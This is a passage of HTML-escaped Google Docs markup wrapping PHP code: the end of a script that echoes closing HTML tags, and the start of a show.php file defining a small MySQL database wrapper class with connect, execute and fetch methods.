style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;echo&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;&amp;lt;/blockquote&amp;gt;&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;echo&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;&amp;lt;/div&amp;gt;&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:700;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;show.php&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;div dir=&quot;ltr&quot; style=&quot;margin-left:0pt;&quot;&gt;&lt;table style=&quot;border:none;border-collapse:collapse;width:468pt&quot;&gt;&lt;colgroup&gt;&lt;col width=&quot;*&quot;&gt;&lt;/colgroup&gt;&lt;tbody&gt;&lt;tr style=&quot;height:0pt&quot;&gt;&lt;td style=&quot;border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;&quot;&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.7999999999999998;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;class&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#21439c;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;db&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;public&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $conn, $res;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;function&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;__construct&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;()&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;global&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $servername, $username, $password, $db_name;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$this&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;conn &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;mysql_connect&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($servername, $username, $password) &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;or die&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;connect error&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;mysql_select_db&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($db_name);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;function&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#21439c;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;execute&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($query)&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$this&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;res &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;mysql_query&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($query) &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;or die&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;SQL ERROR&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;function&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#21439c;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;fetch_all&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;()&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$res &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;array&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;();&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;while&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($row &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;mysql_fetch_row&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($this&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;res))&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier 